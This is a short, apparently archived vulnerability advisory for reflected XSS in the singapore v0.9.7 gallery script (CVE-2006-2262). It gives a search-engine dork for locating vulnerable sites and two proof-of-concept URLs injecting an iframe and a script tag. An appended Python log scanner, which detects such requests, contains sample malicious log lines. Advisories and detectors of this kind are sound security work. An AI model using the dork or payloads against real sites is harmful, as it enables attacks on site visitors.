singapore v0.9.7 XSS Vulnerabilities

Published: 2006.05.09
Credit: alp_eren ayyildiz org
Risk: Low
CWE: CWE-79
CVE: CVE-2006-2262
Local: No
Remote: Yes

CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

SOFTWARE:
=========

singapore v0.9.7

DESCRIPTION:
============

The system is vulnerable to various XSS attacks.

google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery

429 results :)

XSS code example
================

www.site.com/images/index.php?gallery=[gallery name]&#132;&#145;=<iframe%20src="http://www.yoursite.com">

www.site.com/images/index.php?gallery=[gallery name]&#132;&#145;=<script>alert("lol")<script>

mail: alp_eren[at]ayyildiz[dot]com

web : http://www.ayyildiz.org

greets to thehacker,iskorpitx,suskun,shadow, and all AYT member
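
Added example, not part of the original advisory: a log check for the request shape shown in the PoC URLs above. It flags index.php requests whose query string carries HTML markup in any parameter name or value, after undoing repeated percent-encoding. The log lines, the parameter name "x" and the tag pattern are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Any HTML tag opening; assumes gallery and image names never contain one.
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z!]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines: documentation IPs, hypothetical parameter "x".
SAMPLE_LOG = [
    '192.0.2.10 - - [09/May/2006:10:00:01 +0000] "GET /images/index.php?gallery=holiday&image=beach.jpg HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/May/2006:10:00:07 +0000] "GET /images/index.php?gallery=holiday&x=<iframe%20src=%22http://example.com%22> HTTP/1.1" 200 4980',
    '192.0.2.44 - - [09/May/2006:10:00:09 +0000] "GET /images/index.php?gallery=holiday&x=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 4980',
]

def decode_fully(text, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def suspicious_params(url):
    """Return decoded (name, value) pairs of an index.php request that carry markup."""
    parts = urlsplit(url)
    if not parts.path.endswith("index.php"):
        return []
    hits = []
    # Check every parameter, names included: the payload need not be in "gallery".
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        name, value = decode_fully(name), decode_fully(value)
        if MARKUP.search(name) or MARKUP.search(value):
            hits.append((name, value))
    return hits

def scan(log_lines):
    """Return [(line_number, hits)] for log lines requesting index.php with markup."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```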


Copyright 2015, cxsecurity.com